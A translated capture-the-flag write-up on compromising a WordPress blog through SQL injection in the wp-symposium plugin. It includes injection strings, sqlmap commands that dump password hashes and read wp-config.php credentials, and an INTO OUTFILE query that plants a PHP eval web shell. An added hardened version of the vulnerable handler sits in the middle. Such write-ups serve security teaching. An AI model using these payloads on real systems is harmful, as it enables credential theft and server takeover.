0x00 Information Gathering
The target site is a WordPress blog. The server banner:
```
Apache/2.4.10 (Debian)
```
Since it is WordPress, the obvious first step is a wpscan run.
```
[+] We found 2 plugins:

[+] Name: akismet
 |  Latest version: 3.3.4
 |  Location: http://218.2.197.234:2040/wp-content/plugins/akismet/
[!] We could not determine a version so all vulnerabilities are printed out
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
    Reference: https://wpvulndb.com/vulnerabilities/8215
    Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
    Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: wp-symposium - v15.1
 |  Location: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/
 |  Readme: http://218.2.197.234:2040/wp-content/plugins/wp-symposium/readme.txt
[!] The version is out of date, the latest version is 15.8.1
```
Two outdated ("past their prime") plugins, both with known vulnerabilities.
```
[!] Title: WP Symposium <= 15.1 - SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/7902
    Reference: http://permalink.gmane.org/gmane.comp.security.oss.general/16479
    Reference: http://packetstormsecurity.com/files/131801/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3325
    Reference: https://www.exploit-db.com/exploits/37080/
[i] Fixed in: 15.4

[!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8140
    Reference: https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6522
    Reference: https://www.exploit-db.com/exploits/37824/
[i] Fixed in: 15.8

[!] Title: WP Symposium <= 15.1 - Blind SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8148
    Reference: https://security.dxw.com/advisories/blind-sql-injection-in-wp-symposium-allows-unauthenticated-attackers-to-access-sensitive-data/
[i] Fixed in: 15.8
```
0x01 Exploitation
The SQL injection in CVE-2015-3325 sits in get_album_item.php of the wp-symposium plugin.
```php
<?php
include_once('../../../wp-config.php');
global $wpdb;
$iid = $_REQUEST['iid'];
$size = $_REQUEST['size'];
// $size is concatenated straight into the SELECT list; only $iid goes through prepare()
$sql = "SELECT ".$size." FROM ".$wpdb->base_prefix."symposium_gallery_items WHERE iid = %d";
$image = $wpdb->get_var($wpdb->prepare($sql, $iid));
header("Content-type: image/jpeg");
echo stripslashes($image);
?>
```
Crafting the size parameter lets you run your own SQL query, and the code does no filtering at all. However, when I restricted the column-name lookup by table_name nothing came back, and without the table_name restriction only 1 KB of content is shown because of the file size limit, so the column names of wp_users never appeared.
```
?size=group_concat(column_name) FROM information_schema.columns WHERE table_schema=database() and table_name=%27users%27%20;%20--
```
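For comparison, here is a hardened version of the same handler. This is an added illustration, not WP Symposium's actual fix; the allowed column names `thumb` and `large` are assumed, since the plugin's real gallery schema is not shown on this page.

```php
<?php
// Added example: hardened rewrite of get_album_item.php. Not the plugin's own
// patch; the column names in $allowed_sizes are assumed for illustration.
include_once('../../../wp-config.php');
global $wpdb;

// Column names are SQL identifiers and cannot be bound as parameters, so the
// only safe option is a fixed allowlist checked with strict comparison.
$allowed_sizes = array('thumb', 'large');

$size = isset($_REQUEST['size']) ? (string) $_REQUEST['size'] : '';
$iid  = isset($_REQUEST['iid'])  ? absint($_REQUEST['iid'])   : 0;

if (!in_array($size, $allowed_sizes, true) || $iid === 0) {
    // Unknown column or missing id: refuse rather than interpolate user input.
    status_header(400);
    exit;
}

// $size is now one of a fixed set of identifiers, so it may appear in the
// SELECT list; the row id still goes through prepare() as a bound integer.
$table = $wpdb->base_prefix . 'symposium_gallery_items';
$image = $wpdb->get_var($wpdb->prepare(
    "SELECT `{$size}` FROM `{$table}` WHERE iid = %d",
    $iid
));

if ($image === null) {
    status_header(404);
    exit;
}

header('Content-Type: image/jpeg');
echo $image;
```

The allowlist is the essential part: because `size` selects a column, no amount of escaping or quoting would make the original string interpolation safe.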
No luck, so I gave up on this one and turned to the blind-injection CVE.
https://www.exploit-db.com/exploits/37822/
The topic_id parameter is blind-injectable. Open the corresponding page, save the POST request to a file, and test it with sqlmap. (I hadn't removed the sleep function from the exploit while testing, so the script ran for far longer than it needed to...)
```
sqlmap -r "E:1.txt" --dbs --level 3
```
```
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] wordpress
```
Table names
```
sqlmap -r "E:1.txt" -D "wordpress" --tables
```
```
Database: wordpress
[36 tables]
+------------------------------+
| wp_commentmeta               |
| wp_comments                  |
| wp_links                     |
| wp_options                   |
| wp_postmeta                  |
| wp_posts                     |
| wp_symposium_audit           |
| wp_symposium_cats            |
| wp_symposium_chat2           |
| wp_symposium_chat2_typing    |
| wp_symposium_chat2_users     |
| wp_symposium_comments        |
| wp_symposium_events          |
| wp_symposium_events_bookings |
| wp_symposium_extended        |
| wp_symposium_following       |
| wp_symposium_friends         |
| wp_symposium_gallery         |
| wp_symposium_gallery_items   |
| wp_symposium_group_members   |
| wp_symposium_groups          |
| wp_symposium_likes           |
| wp_symposium_lounge          |
| wp_symposium_mail            |
| wp_symposium_news            |
| wp_symposium_styles          |
| wp_symposium_subs            |
| wp_symposium_topics          |
| wp_symposium_topics_images   |
| wp_symposium_topics_scores   |
| wp_symposium_usermeta        |
| wp_term_relationships        |
| wp_term_taxonomy             |
| wp_terms                     |
| wp_usermeta                  |
| wp_users                     |
+------------------------------+
```
Column names
```
sqlmap -r "E:1.txt" -D "wordpress" -T "wp_users" --columns
```
```
Database: wordpress
Table: wp_users
[10 columns]
+---------------------+---------------------+
| Column              | Type                |
+---------------------+---------------------+
| display_name        | varchar(250)        |
| ID                  | bigint(20) unsigned |
| user_activation_key | varchar(60)         |
| user_email          | varchar(100)        |
| user_login          | varchar(60)         |
| user_nicename       | varchar(50)         |
| user_pass           | varchar(64)         |
| user_registered     | datetime            |
| user_status         | int(11)             |
| user_url            | varchar(100)        |
+---------------------+---------------------+
```
Dumping the data
```
sqlmap -r "E:1.txt" -D "wordpress" -T "wp_users" -C "user_pass" --dump
```
```
+------------------------------------+
| user_pass                          |
+------------------------------------+
| $P$BoRvgt/kaEDWqyiq0a3U8QjUQAO6gQ0 |
+------------------------------------+
```
With CVE-2015-3325 and the table and column names found above, the administrator record can be queried as well.
```
?size=group_concat(user_nicename,0x7e,user_pass) FROM wp_users%20;%20--
```
But the admin password in the database is strongly hashed and could not be recovered.
The earlier scan had also turned up a phpMyAdmin page on the server, so that was the next angle.
Use sqlmap to retrieve the database users' password hashes (which would double as the phpMyAdmin logins).
```
sqlmap -r "E:1.txt" --current-user --password
```
```
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *AA59232D46C9C0751BA3069045A0B90F3C6431C4
[*] root [1]:
    password hash: *74ACCF7FB15CDBAEE88B9E7F7B58352D3308CFF2
[*] wordpress [1]:
    password hash: *A22BD9F95BF505E792C556FC1EF9FCFA6B6B5D9B
```
These could not be cracked either...
On a tip from a more experienced teammate, I used sqlmap to read the WordPress configuration file directly.
```
sqlmap -r "E:1.txt" --file-read "/var/www/html/wp-config.php" -p "topic_id"
```
That successfully yielded the phpMyAdmin account and password (the database credentials stored in wp-config.php).
Getshell
Log in to phpMyAdmin and write a shell with an SQL query.
```sql
select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/nibuhuicaidao.php';
```
Error: Can't create/write to file '/var/www/html/nibuhuicaidao.php' (Errcode: 13)
The directory is not writable by the database process.
Brute-forcing directories with DirBuster turned up an `images` directory, which on testing proved to be writable.
```sql
select '<?php @eval($_POST[adadminn])?>' INTO OUTFILE '/var/www/html/images/nibuhuicaidao.php';
```
Connect with China Chopper (菜刀) and grab the flag: flag{Hi_Web_fLaG_Is_HEre}
Source: https://www.cnblogs.com/liuzhongrong/p/12263081.html